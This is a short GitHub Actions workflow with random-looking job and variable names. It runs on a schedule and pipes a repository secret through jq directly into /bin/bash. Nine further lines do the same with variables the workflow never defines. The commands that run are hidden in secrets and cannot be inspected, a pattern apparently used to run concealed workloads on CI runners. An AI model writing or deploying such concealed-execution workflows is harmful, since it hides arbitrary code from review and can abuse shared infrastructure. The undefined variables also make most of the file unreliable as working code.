name: xiabaile2318

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiabaile2318
        env:
          yzb5008: ${{ secrets.yzb5008 }}
        run: |
          echo $yzb5008 | jq -r .ljket0 | /bin/bash
          echo $qxju148 | jq -r .elqi2631 | /bin/bash
          echo $ydzdc79888 | jq -r .cxdtb15773 | /bin/bash
          echo $c16 | jq -r .dwy435 | /bin/bash
          echo $vpixz317 | jq -r .sjal81699 | /bin/bash
          echo $uipx4 | jq -r .ovtiw665 | /bin/bash
          echo $s98800 | jq -r .y152 | /bin/bash
          echo $jtji3 | jq -r .mvbi99925 | /bin/bash
          echo $tp3093 | jq -r .eb5423 | /bin/bash
          echo $kfv6 | jq -r .p8088 | /bin/bash

